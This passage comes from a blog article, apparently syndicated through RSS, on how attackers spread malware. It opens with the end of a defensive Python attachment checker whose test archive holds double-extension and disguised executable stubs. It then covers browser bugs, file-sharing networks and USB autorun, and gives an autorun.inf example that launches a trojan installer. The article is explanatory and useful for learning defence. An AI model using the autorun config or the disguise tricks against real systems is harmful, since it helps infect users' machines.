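    return reasons


def build_sample_mail_zip():
    """Constructed sample attachment: a clean text file, a double-extension
    executable and a nested archive holding a PE renamed to .jpg."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as izf:
        izf.writestr("photo.jpg", b"MZ\x90\x00" + b"\x00" * 60)
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as zf:
        zf.writestr("readme.txt", "please see the attached invoice")
        zf.writestr("invoice.pdf.exe", b"MZ" + b"\x00" * 62)
        zf.writestr("pics.zip", inner.getvalue())
    return outer.getvalue()


if __name__ == "__main__":
    for reason in flag_attachment("mail.zip", build_sample_mail_zip()):
        print("blocked:", reason)
```

<p>The double extension is what the attachment trick relies on: Windows hides the known .exe extension by default, so the user sees &#8220;invoice.pdf&#8221;. Password-protected archives, which this check cannot open, are the attacker&#8217;s usual next step and should simply be refused.</p>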
<p><strong>Method 2 : Infection via browser <a class="glossaryLink" href="http://www.megapanzer.com/" title="Glossary: Bug" target="_blank">bugs</a></strong> <img class="alignright size-full wp-image-979" title="browsers" src="http://www.megapanzer.com/wp-content/uploads/browsers.jpg" alt="browsers" width="104" height="97" /></p>
<p>The browser is doubtlessly the most used application on a computer. We use it to surf the Internet, to check our mail of course, to chat, and many programs people once installed locally on their computer are now loaded into the browser and ready to use, for example word processors or spreadsheets. Browsers have become very important, and over the years their functionality and extensions grew and changed their usage enormously. With this quick development and the possibility to install plugins, the attack surface grew as well. Code reviews were conducted more often, not only on the browsers but also on the plugins, which revealed many critical and also not so critical <a class="glossaryLink" href="http://www.megapanzer.com/" title="Glossary: Bug" target="_blank">bugs</a>. These circumstances also attracted the attackers&#8217; attention and opened new ways for them to spread their <a class="glossaryLink" href="http://www.megapanzer.com/?page_id=1210" title="Glossary: Malware" target="_blank">malware</a>. By leading a victim to a site that contains malicious HTML, scripting or plugin code, an attacker can force the victim&#8217;s browser to execute hidden actions, force it to download and install the damage routine of the <a class="glossaryLink" href="http://www.megapanzer.com/?page_id=1214" title="Glossary: Trojan horse" target="_blank">Trojan horse</a> and infect the system that way.<br />
This is much more convenient than the variant with the infected attachment. An email containing a simple link to a web page doesn&#8217;t look suspicious, and additionally it is a one-click infection (instead of a double-click).</p>
<p><strong>Method 3 : Removable data storage devices</strong><img class="alignright size-full wp-image-982" title="usb-memory-stick" src="http://www.megapanzer.com/wp-content/uploads/usb-memory-stick.jpg" alt="usb-memory-stick" width="142" height="59" /></p>
<p>There was a time when classic <a class="glossaryLink" href="http://www.megapanzer.com/?page_id=3304" title="Glossary: Computer virus" target="_blank">computer viruses</a> propagated by sharing infected floppy disks and executing program files. Sharing and executing was simply the only method. Even if floppy disks are not used as data storage devices anymore (maybe you&#8217;re still using one as a boot device), the method itself is still in use. In the meantime CD-ROMs and USB memory sticks have replaced floppy disks almost completely, and Microsoft introduced the Autorun feature, which executes commands automatically when a new data storage device is connected. This combination of removable storage devices and automatic execution revived the ancient propagation method, and USB memory sticks and CD-ROMs/DVDs, besides being data storage media, also served as carriers to infect computers with <a class="glossaryLink" href="http://www.megapanzer.com/?page_id=1210" title="Glossary: Malware" target="_blank">malware</a>.</p>
<p>Here is an example of what the file autorun.inf has to look like:</p>
<div style="text-align: left;" dir="ltr">
<pre class="source-ini" style="padding-left: 30px;"><span class="re0"><span class="br0">[</span>autorun<span class="br0">]</span></span>
<span class="re1">open</span>=<span class="re2">installMegapanzer.exe</span>
<span class="re1">icon</span>=<span class="re2">myIcon.ico</span></pre>
</div>
<p>This way of <a class="glossaryLink" href="http://www.megapanzer.com/?page_id=1210" title="Glossary: Malware" target="_blank">malware</a> propagation was used a lot in the past, and Microsoft as well as installed third-party software now trigger an alert if a data storage device uses the autorun feature. So this method is not that reliable anymore and has its restrictions.</p>
<p>Additionally, and worth mentioning: a <a class="glossaryLink" href="http://www.megapanzer.com/?page_id=1214" title="Glossary: Trojan horse" target="_blank">Trojan horse</a> itself can, once running on a victim&#8217;s system, infect other writable USB data storage devices and so propagate in the well-known manner of the floppy disk days. Ancient but proven.</p>
<p><strong>Method 4 : File sharing networks</strong></p>
<p>Another common way to propagate <a class="glossaryLink" href="http://www.megapanzer.com/?page_id=1210" title="Glossary: Malware" target="_blank">malware</a> is using the various Internet-based file sharing networks like BitTorrent, eMule, LimeWire etc. An attacker tries to get hold of a new release of a popular software and injects his malicious code into the genuine software package. After the initial infection, the attacker offers the infected file to other users for download.<br />
Two advantages come with this method:</p>
<ul>
<li>If a victim downloads the infected file he&#8217;s &#8220;expecting&#8221; an executable file and doesn&#8217;t become suspicious just because of its file extension. He &#8220;will&#8221; execute it after downloading.</li>
<li>Once the file has been downloaded by the first victim, the availability of the file has doubled: two people now offer the infected file for download. All the attacker has to do is make sure he is using a popular software, and the propagation will advance at a fast pace.</li>
</ul>
<p><strong>What&#8217;s coming up in the second article</strong></p>
<p>The goal of the first part was to describe the methods attackers use to propagate their <a class="glossaryLink" href="http://www.megapanzer.com/?page_id=1210" title="Glossary: Malware" target="_blank">malware</a> by distributing it in an active way, by sending &#8220;something&#8221; to the victims and expecting them to execute an action with this &#8220;something&#8221;. These ways are well known to all of us because the media permanently inform us about the threats we are exposed to and the latest incidents that happened, and give us the relevant background information. In the next article I will give you an understanding of how to inject <a class="glossaryLink" href="http://www.megapanzer.com/?page_id=1210" title="Glossary: Malware" target="_blank">malware</a> into a victim&#8217;s browsing session by taking over and controlling his data stream. More subliminal, more state-of-the-art, stay tuned.</p></glossarycode></glossarycode></glossarycode></glossarycode>]]></content:encoded>
			<wfw:commentRss>http://www.megapanzer.com/2009/03/24/nine_ways_how_hackers_propagate_malware_one-2/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>

